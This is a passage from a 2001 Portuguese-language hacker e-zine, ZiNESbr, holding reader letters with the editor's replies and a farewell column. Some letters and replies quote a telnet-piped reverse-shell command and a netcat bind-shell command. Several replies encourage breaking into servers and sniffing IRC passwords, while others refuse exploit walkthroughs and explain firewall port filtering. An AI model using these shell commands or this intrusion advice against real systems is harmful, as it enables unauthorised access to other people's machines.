diante, queria tb agradecer a vcs do Zinesbr q saum du kralho mermo super
gente boa e dea um abraco ae pra vc!!!
gotoxy r0x :P
flowz gotoxy
qd crescer quero ser igual a vc auauauuauauahuauhauhauhauah
flowz
abraco


=========
Resposta:
=========

Eae irmao!!! Obrigado pelos elogios...
   e voce esta certo, estuda mesmo! Pascal eh uma otima linguagem
de programacao.. recomendo vc, dps de aprender pascal, passar p/
uma linguagem como C e depois ASM. 

gostei! vc eh mais um newbie fucador! um hacker iniciante, como
eu,entre outros! e juntos, em geral, seguiremos nessa jornada..:)

Um abraco.


(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------


.------------------------------------------------------------.
| Formulrio enviado em: 23:41:29, 02/06/01                  |
| Nome: Leo                                                  |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: Avisa ai                                          |
`------------------------------------------------------------'

=========
Mensagem:
=========

Ae, avisa quando sair a Zine08, e assim por diante

[]'s,
   Leo

=========
Resposta:
=========

Pow mano,  s voce visitar a nossa pagina em fins de semana 
que voce vai ficar sabendo! Lembre-se: nosso zine  nao tem
datas de lancamento... ela sai no site assim q fica pronto,
blz?


[]'s!!


(Kbytes)

---------- ## ---------- ## ---------- ## ---------- ## ----------


.------------------------------------------------------------.
| Formulrio enviado em: 13:32:33, 09/06/01                  |
| Nome: Leandro Almeida                                      |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: invases                                          |
`------------------------------------------------------------'
 

=========
Mensagem:
=========

Poque vcs  passam zines de invaso usando sistema
operacional windows tecnicas de windows perl para 
windows como instalar ele windows essas coisas

 Valeuuu!!!!

 Obrigado

=========
Resposta:
=========

Porque com isso nos dariamos muita receitinha de 
bolo e assim o numero de script-kiddies aumentariam.
Essas coisas nos aprendemos fucando e se voce, e
entre outros, querem aprender alguma coisa, corram
atras e nao fiquem  esperando por alguem ensinar.

[]s

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 22:01:30, 03/06/01                  |
| Nome: [NemesiS]                                            |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: sugesto imperdvel!                              |
`------------------------------------------------------------'
 

=========
Mensagem:
=========

Falae irmos da Zinesbr! Primeiramente gostaria de dar os
meus parabns a vcs pelo timo trabalho... S tem uma coisa...
Meu visinho o kraz1_r00t eh um mala! Ele no sabe muita coisa...
nem eu sei mto,mas oq eu sei jah d pro gasto... ele vive me
perguntando as coisas que ele l aqui na Zinesbr... tipo...
a l tinha como usar tal exploit, mas no dava explicao direito
 
ex.: Na zine de n 06 na matria: NETCAT / TELNET REVERSO E BIND
SHELL NO NT, no telnet reverso tem o seguinte:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
O comando que terah que ser digitado no servidor alvo eh bem simples:

 /bin/telnet 127.0.0.1 80 | /bin/sh | /bin/telnet 127.0.0.1 25

Onde 127.0.0.1 eh o seu ip! Para saber o seu ip nao tem misterio,basta
digitar: ifconfig ppp0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

aki no est explicando direito. Deveria dizer que vc tem q abrir uma
conexo com o alvo tal q c tem q descobrir a senha ou usar uma
backdoor etc... isso  preciso pois nem todos "enchergam as coisas". tudo
deve ser explicado melhor!

 na parte BIND SHELL NO NT:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
	 Vamos ver agora como nos utilizamos o netcat para bindar uma
 shell no WindowsNT. Para isso, o servidor alvo deve ter o nc.Caso
 ele nao tenha, voce deve envia-lo para la! Sao muitas as tecnicas
 para invadir uma makina Nt, as mais simples, sao:

 * Invasao por Compartilhamento
 * Unicode - Rds ... (eca..)
 * Engenharia social
 * Etc

	Onde voce pode utilizar qualquer uma dessas tecnicas para se
 enviar o netcat. A invasao por compartilhamento todos nos conhecemos,
 a invasao via unicode,rds... os kiddies conhecem, pergunte para eles
 se voce nao conhece;) e a engenharia social tambem todos nos
conhecemos.
 Bem, depois de ter enviado o netcat para o servidor, basta digitar o
 comando abaixo para bindar a shell do winnt:

 C:\> nc -L -v -p 8888 -e cmd.exe

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 Olhem para isso!
 o cara no t com a mnima vontade de escrever....

 "A invasao por compartilhamento todos nos conhecemos,
 a invasao via unicode,rds... os kiddies conhecem, pergunte para eles
 se voce nao conhece;) e a engenharia social tambem todos nos
conhecemos."

 A maioria dos leitores da Zinesbr so leigos no assunto e querem
aprenter,se o cara no explica direito, no vai dar em nada! o cara 
s vai perder tempo escrevendo coisa pra encher lingia!

deveria haver algum LINK em cada umas das 3 tcnicas citadas para uma
url DE VOCS explicando tudo direitinho, tem muita gente que no sabe 
enviar arquivo por unicode (eu sou um exemplo!, s sei fazer o defaced, 
listar arquivos...).

Agora com tudo isso eu sugiro a soluo! porque vocs no criam uma zine 
totalmente em FLASH ou at mesmo em html (essa no  mto boa, mas melhoraria 
mto) da fica simpes as coisas, seria possvel fazer animaes na zine, 
ilustraes, links praticos. O rendimento ia ser em 100%. VC's no iam mais 
receber e-mail de caras como eu enchendo o saco com dvidas. =)

 tipo asism.. muitos grupos reclamam em seus defaces que os gringos no
assumem q o brasil tem uma propriedade intelectual alta, e q isso deveria
mudar...
 mas se um cara chegar a falar com um deles e perguntar at mesmo onde
se acha um exploi qualquer, ou uma dica ou explicao, ele  chamado de 
lammer e  tratado desigualmente.

 Mas ele deveria ajudar o cara q no sabe justamente para "aumentar
ainda mais a propriedade intelectual brasileira"!

 essa bronca e essa sugesto no so para criticar nem para "ofender",
 mas sim para melhorar ainda mais a zinesbr, fazer valer apena o tempo
gasto! porque eu concidero vc's pra kct! (desculpe o palavreado =)...)

  isso ae meus amigos da zinesbr! espero que esta menssagem no seja
s mais uma na sua caixa de entrada.
 Obrigado pela ateno e no se esqueam de CRESCER!
 abrao!


=========
Resposta:
=========

Eae amigo! Obrigado por estar enviando este email para dar suas
criticas, alias, criticas construtivas!!:) Com isso, vemos o nosso
erro e tentaremos conCerta-lo..:)

Assim como falaria JACK O ESTRIPADOR, "vamos por partes"...
 
o "cara" que voce tanto falou era eu (Gotoxy), e assim.. acho que
se eu fosse ensinar essas tecnicas (enviar arkivo por rds, engenharia
social), eu estaria fugindo do assunto principal do texto. Pois essas
tecnicas, ns mesmos que temos que aprender sozinhos, e nao ficar s
esperas de alguem nos ensinar (tambem existe muitos textos pela 
internet aih..basta procurar!!)

sobre rds, vc encontra textos em varios sites por aih! eu nao sei
ao certo, pois nao procuro nada relacionado a isso.. programas
de terceiros, p/ invadir NT e tal.. eu nao curto..soh os script-kiddies
curtem! e eu tb nem sei pq mencionei a tecnica rds, unicode, entre
outras do genero, p/ enviar um arkivo para uma makina NT. Pois
existem outras alem delas!! Quais?? Fuce e aprenda!

Vi que voce faz defaces:

"(eu sou um exemplo!, s sei fazer o defaced, listar arquivos...)."

por isso que eu, nao soh eu como todos, nao devemos ficar passando
informacao p/ pessoas que nao sabem controla-la, pois issso prejudica
muito o hacking etico

Sobre a zine em FLASH, HTML,etc, eu acho que ficaria ruim. Pois
escrever o zine em arquivos .txt eh bem melhor para ler e tal..
Mas a ideia eh boa.. vou falar com o kbytes e em breve, se o kbytes
(webdesign do zinesbr) gostar da ideia, nos faremos o que vc falou.

Ahh, veja o que voce escreveu:

" aki no est explicando direito. Deveria dizer que vc tem q abrir uma
  conexo com o alvo tal q c tem q descobrir a senha ou usar uma
  backdoor etc... isso  preciso pois nem todos "enchergam as coisas". 
  tudo deve ser explicado melhor! "

Voce nao entendeu mano..nao precisa entrar no servidor, pois akele
comando vai ser executado via CGI, pela porta 80(www), que fica 
aberta nos hosts..sakou ? 
 
Bem..entao eh isso mano!
   Assim que der, envie mais criticas,elogios, entre outras coisas,
tudo eh bem vindo!! =P

Obrigado.
 []s

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------


.------------------------------------------------------------.
| Formulrio enviado em: 22:00:01, 15/06/01                  |
| Nome: Neo                                                  |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: C                                                 |
`------------------------------------------------------------'

=========
Mensagem:
=========

Essa  uma dvida que eu tenho mais pode at ser uma matria
para o zinesbr. Eu uso o windows, como que utilizo exploits escritos em C.
Preciso de shell,? mas como uso uma?

=========
Resposta:
=========

Eae Neo!! Acho que nao serah necessario fazer deste email uma
materia, pois as respostas para a sua duvida eh muito pequena..ok?
Bem, pra vc utilizar exploits no windows, basta ter um compilador
C (um bom compilador de C eh o DEV C++, vc pode encontra-lo no
site http://www.bloodshed.net/devcpp.html). Mas nao sao todos
que vao compilar certinho, pois exploits pra linux, tanto locais
quanto remotos, utilizam headers que os compiladores C pra
windows nao possuem. Se voce quer exploits para explorar 
plataformas unix, recomendo voce ter uma shell!! O qual voce
pode invadir uma rede unix, o qual nao eh dificil para um fucador.
Depos de arrumar uma, basta jogar o codigo pra la e compilar 
(gcc arkivo.c -o arkivo).

Bem, entao eh isso! Um abraco.

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 04:05:46, 20/06/01                  |
| Nome: Backz                                                |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: Ze                                                |
`------------------------------------------------------------'

=========
Mensagem:
=========

  E aez kra.. Pow, a zine ta muito rulez, adorei o Ze e
gostariaque fosse criado um tutorial de pascal, pois admirei
a estabilidade do programa. Editei meu inetd e configurei o 
Ze pra servir de shell, e  convidei todos meus amiguinhos 
newbies pra usar. Ta rulez!! 
  Gostaria que voces divulgassem o codigo fonte da primeira 
versao do Ze, se isso nao  for nenhum problema...
  Valleuz Kras, continuem sempre assim..

=========
Resposta:
=========

  Eae Backz!! Antes de tudo, o ZiNESbr agradece pelos elogios!!:)
Eu ando meio ocupado, escrevendo outros tutoriais, como o tutorial
de Assemblty q eu to fazendo, saka? pois eh mano, tah dificil segurar
a barra aki.. muita coisa a fazer, em tao pouco tempo... mas eu
vou ver se eu consigo fazer num futuro (proximo!). 
 E o ZE, tipo, eu nao criei novas versoes dele, pois tinha dado
um problema aki na minha makina e eu perdi ele.., alias, perdi
tudo q eu tinha.. ai ai..kernel panic sux!:) caso eu ainda tivesse
aqui com ele, eu ia publica-lo mano, na manha..:p
 Bem entao eh isso irmao, assim que possivel eu comeco um curso
de pascal, ou entao, quem tiver afim de ajudar, faca uns textos
de pascal aih para colaborar com os irmaos, newbies fucadores!!!

ps: o source do Z.E. nao foi publicado, pq aih nao ia ter graca!
pois se alguem olha-se o codigo, ia descobrir como rootar!!

Falow ae Backz,
   um abraco.

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: ??:??:??, ??/??/??                  |
| Nome: Rafael                                               |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: ???                                               |
`------------------------------------------------------------'

=========
Mensagem:
=========

Meu nome eh Rafael f. 
Curto pra kct essa zine vc estaum de parabems !!!!!!!!!!!!!!!!!!!!
Gotoxy, pelo que eu vi vc curti dbz tb hehehehe eh muito ferra 
hem!!!!!!!!!!!!!
AH eu tenho uma duvida, eu leio em varios testos e tal como hackear 
servidores de irc mas eles so falam o que eu devo fazer la dentro do 
servidor, mas como eu fao pra entra la ????????????
Tipow faleu pela ateno !!!!!!!!!!!!!!!!!!!!!

=========
Resposta:
=========

Opa mano!!
   Valeu pelos elogios..:)

Yeah!! DragonBallZ rlz!! =) 

Bem manu, para voce entrar num server de irc, primeiro voce deve
invadir a makina... 

por exemplo: irc.unisys.com.br
     aih voce tem q invadir o servidor unisys.com.br pra dps
fazer o q quizer.. como por exemplo sniffar a rede e logar todos
os nicknames e passwords deles...saka? "Mas como invadir o sistema?" Aih
que tah o X da questao !!:) Fuce meu amigo que com certeza voce
vai conseguir!! =) invadir um sistema nao eh tao dificil quanto 
parece.. mas tenha um objetivo para invadir um servidor, porque invadir
sistemas nao eh diversao, e sim obter conhecimento! 

dicas? hmm, procure achar contar validas no sistema, e/ou procure jeitos
de entrar remotamente explorando os servicos do sistema que estejam 
bugadas...tente tb a famosa engenharia social, etc, etc...

   boa sorte..

Um [],
   t+!

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 19:43:40, 21/06/01                  |
| Nome: dr34d                                                |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: parabens                                          |
`------------------------------------------------------------'

=========
Mensagem:
=========

Ai gotoxy parabens kra pelas suas zines....
tipo e por vc ter a PACIENCIA q alguns ou mtos num tem ...pra poder 
ensinar o pessoal e fazer essas zines q me ajudaram demais mesmo....
tipo assim....naum kerendo ser chato.....mas numa proxima edicao do 
zinesbr num tem como vc fazer um tutorial ou um txt pra explicar como 
funfam as portas e como fecha-las ou filtrar e tal....hehehe brigadu 
kra e parabens a vc e ao kbytes


=========
Resposta:
=========

dr34d, valeu aih mano! eh bom saber q nossa zine tah ajudando.. 
realmente..escrever textos requer muita paciencia =)

acho q nao serah necessario explicar o funcionamento das 
portas num tutorial..pois aki msm da para te dar um help =)
tipu manu.. saka de protocolos??? tcp, udp...sabe? pois eh
mano.. as portas estao relacionadas a esses protocolos..portanto,
para tu entender de portas, basta procurar por tutoriais de 
protocolos que voce vai entender!! veja o arkivo /etc/services
e veja q portas utilizam o protocolo tcp e q portas utilizam
o protocolo udp! mas isso nao vai ajudar em muita coisa, recomendo
mesmo vc buscar textos sobre protocolos (tcp/ip, udp,...)

para voce fechar as portas.. basta ver q porta tu q fechar
primeiro!! use o netstat ou entao use um scanner, como por
exemplo o NMAP, para ver q portas tao abertas e dps q ver
as portas abertas use o /etc/inetd.conf pra fechar os
servicos... outras portas como a do sendmail(25), para 
fecha-la, basta kilar o pid ... (ps -e e dps kill -9 pid),
ou entao, pode agilizar o trabalho fazendo um script tal
como:

# cat > dread
kill `ps awx | grep sendmail | awk '{ print $1 }'`
[Ctrl+D]
# chmod +x dread
 
e depois soh executar!! 

para vc filtrar as portas, basta primeiro saber a porta
q tu q filtrar (duh) e depois basta vc utilizer um firewall..
por exemplo, suponhamos q vc quer filtrar a porta 6000,
q eh a do X, basta digitar:

*obs: usando o firewall ipfwadm 

# ipfwadm -I -a deny -P tcp -o -S 0.0.0.0/0 -D 0.0.0.0/0 6000:6000
# ipfwadm -I -a deny -P udp -o -S 0.0.0.0/0 -D 0.0.0.0/0 6000:6000

sendo assim.. vc nao receberah nenhum tipo de conexao via TCP e/ou UDP
na porta 6000, pois ela estarah filtrada. Ahh!! leia o setor 16 do
zinesbr edicao 07 para vc entender mais sobre firewall..

Acho que deu para entender!:)
t+ manu!!
[]s

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: ??:??:??, ??/??/??                  |
| Nome: Roberto                                              |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: Links em HP                                       |
`------------------------------------------------------------'

=========
Mensagem:
=========

Ol Gotoxy,
Sou leitor asssduo do ZinesBR, e primeiramente queria parabeniz-lo pela
qualidade do zine.. ainda no encontrei material em portugus melhor do que
o seu zine, pois  completo, diversificado... enfim, parabns.
Mando este e-mail pelo seguinte: estou montando uma pgina sobre segurana
da informao, pretendo colocar alguns textos, apostilas, e muito download.
Ainda est "no forno". Mas o que eu queria saber  se eu posso colocar
links
na seo de zines para o download do ZinesBR (qq edio, nova ou j
publicada).. mando este email perguntando isso pois, assim como voce (ou,
acho que todo mundo), ODEIO cpias ou procedimentos sem a autorizao do
autor.. ento, est a o "pedido de autorizao".. :)
Pra complementar.. se vocs precisarem de alguma matria, algum programa,
enfim, qualquer mo a.. eu terei o prazer de ajudar o ZinesBR a crescer
kda
vez mais... pode contar comigo.
Meu nome  Roberto, tenho 17 anos e moro em Porto Alegre. "Fuo" em todas
as
plataformas Windoze, no Linux.. programo em C, Pascal e Delphi, e sou
consultor de segurana em sistemas WinNT/2000..

Bom,  isso... aguardo reply!


=========
Resposta:
=========

Ol Roberto,

Primeiramente, gostaria de agradecer pelos elogios feitos por voce para 
o ZiNESbr. Obrigado mesmo!
Segundamente, eu autorizo o seu pedido com prazer mano! Ser uma honra
para o ZiNESbr!!:)Ah, e nao se esquea de enviar o endereco do seu site!
Roberto, sobre o "se vocs precisarem de alguma matria", gostei muito
dessa frase..:) Estamos sim precisando de textos, e se voce enviasse
uma materia de sua autoria, agradeceriamos mais ainda!

Bem entao eh isso Roberto, 
    Obrigado pela colaborao!

  Um Abrao,
Gotoxy.

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 12:57:35, 27/07/01                  |
| Nome: macaco                                               |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: Wu-ftpd & bind                                    |
`------------------------------------------------------------'

=========
Mensagem:
=========

Faa um texto explicando o uso do exploit mais usado 
para explorar a falha no wu-ftpd e bind.


=========
Resposta:
=========

Nem vai dar mano! Assim eu estaria apenas contribuindo para 
aumentar o numero de script-kiddies.

Espero que voce nao seja mais um, que quer apenas mais uma
"receitinha de bolo"! 

At.

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 22:30:44, 24/07/01                  |
| Nome: garcia                                               |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: duvidas                                           |
`------------------------------------------------------------'

=========
Mensagem:
=========

tipo, na zine01, diz sobre C. , mas eu sou bem iniciante, o
que  c. ???

=========
Resposta:
=========

Eae !
C eh uma linguagem de programacao! Ou seja, voce usa a linguagem
de programacao C para fazer programas, como por exemplo exploits.
Entendeu mano? 

Entao eh isso!
[]s

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 22:49:46, 23/07/01                  |
| Nome: _m0rp}{3us_                                          |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: duvida                                            |
`------------------------------------------------------------'

=========
Mensagem:
=========

queria saber mais sobre a linguagem perl q aparece na
ultima zine.

 Respondam ae fazendu favor..


=========
Resposta:
=========

Eae kra...
tipo, o sort parou com o curso pq ele ta meio parado com
a linguagem perl, pois esta querendo aprender C! mas procure
em sites de busca q vc encontra apostilas de perl!

um []

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 15:48:37, 21/07/01                  |
| Nome: Anonymous                                            |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: Sugestes!!!                                      |
`------------------------------------------------------------'

=========
Mensagem:
=========

Tipo, porque vcs naum colocom pra proxima zine coisas do
tipo como invadir servidores de irc e tal ????

=========
Resposta:
=========

Invadir um servidor de irc, eh a mesma coisa de invadir qlq outro
servidor! Mano, depende do servidor ueh..nao sao todos que possuem
as mesmas falhas! Cabe a voce as encontra-las e explora-las!! Como?
Bem, eh aih que ta o X da koisa! Fuce meu amigo!!:) 

Inteh

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------

.------------------------------------------------------------.
| Formulrio enviado em: 16:51:50, 30/07/01                  |
| Nome: Spawn                                                |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: Elogio                                            |
`------------------------------------------------------------'


=========
Mensagem:
=========

Ola galera do ZinesBR, primeiramente gostaria de dizer que sempre 
estou lendo seus zines e acho legal a abordagem objetiva que vcs dao
aos assuntos. Bem gostaria de perguntar se for possivel eu gostaria 
de saber se  possivel compilar exploits.C para utiliza-los no Windows.
E tambem gostaria de algumas dicas sobre o Ataque em Pcs compartilhados
que vcs explicaram na zine 00, nao consigo executa-lo mesmo seguindo os 
passos que vcs deram. Espero nao estar torrando o saco de vcs manos.

Bom espero resposta blz ?

Falo man

By Spawn


=========
Resposta:
=========

Eae irmao!!

Valeu aih pelos elogios.. valeu mesmo!
Tipo mano.. exploits sao programas normais... depende do exploits...
pq tipo, o linux possui bibliotecas (como socket.h, etc..) que compilers
do windows nao possuem! Exploits remotos nao da certo compila-los no
windows (compiladores do windows nao possui essas bibliotecas)...
e poukissimos exploits locais (akeles bem simples mesmo!!) dao
certo (raramente!!)!! mas eles nao vao explorar programas windows!
ou seja, nem compensa voce querer compilar exploits no windows!!
exploits linux tem que ser usados no linux e pronto! =)
 

e quanto ao ataque via compartilhamento..o Essential Net Tools
realmente funciona..talvez vc esteja tendo problemas ai com rede
na sua makina! e caso nao consiga, procure novos metodos de invadir
uma makina NT (mas nao va usar unicode, entre esses exploits do
genero, para fazer defaces, pois isso eh ANTI-ETICO!)

E voce nao esta torrando o nosso sako!!:) Fike trankilo.
Um abraco mano!

(Gotoxy)

---------- ## ---------- ## ---------- ## ---------- ## ----------


===============================
Leia agora o Ultimas Palavras!!
===============================
                                                     ZiNESbr
                                                     zinesbr@ieg.com.br
.:x|-------------------------------------------------------------------|x:.










SETOR [18]
==[ Ultimas Palavras ]==
==[ por Gotoxy       ]==

Mais uma edicao terminada. Talvez este seja a ultima edicao lancada
do ZiNESbr. Talvez nos iremos publicar textos separados no site do
ZiNESbr... talvez o ZiNESbr encontre um novo Administrador e novos
escritores... talvez o ZiNESbr ir terminar a sua jornada! Eu nao
estou tendo mais tempo de administrar o zine, infelizmente essa eh
a verdade!! Daqui uns anos, caso o ZiNESbr termine agora, talvez
eu (ou uma outra pessoa) lance o ZiNESbr 2! S o tempo nos dir o
futuro!! Nesse tempo todo (desde a edicao 00 do ZinesBR ateh a 
edicao 08), conheci muitos kras legais, recebi muitas criticas de
muitos kras,... entre outras coisas! Mas, eu acho que fui um kra
legal, tentando ajudar a muitos e, felizmente, acho que ajudei.
Se por um acaso o Zinesbr acabar, nao desista de continuar com o
hacking a frente! Desejo uma boa sorte para todos, neste mundo
virtual, que eh a internet. Se cuide irmaos! E obrigado a todos!!

Obs: nao leia isso como sendo um "ADEUS", ainda nada foi resolvido!
Voce tera mais informacoes (caso algo de "anormal" ocorra) no nosso 
site. 

At a Proxima (para nao dizer ADEUS),
Gotoxy.
________________________________________________________________________
------------------------------------ZiNESbr-----------------------------

                          Perguntas? Duvidas? Sugestoes?
                                zinesbr@ieg.com.br

                                   Home Page
                            http://zinesbr.hpg.com.br


                                6666666666666
          6666                66666666666666666            6666
        6666666              6666666666666666666          6666666
        666666666           666666666666666666666       666666666
             66666666       666666666666666666666    6666666
                666666      666     66666     666  66666
                    666666  66   6   666   6   66 666
                       6666 666     66666     666 6
                       6666 666     66666     666 6
                08        66 666666666 666666666 66        08
           -[ ZinesBR ]-        6666     6666         -[ ZinesBR ]-
                              66 66666666666 66
          66666         666666 66           66 666666         666
          666666    66666666   666         666   66666666    6666
           6666666666666        66666   66666        66666666666
             66666666            66666666666            6666666
            666666                 6666666                666666
             6666                                          6666

zinesbr:~# halt 
Power down.

EoZ (End of Zine) 

Vida Longa ao Hacking Etico!
============================
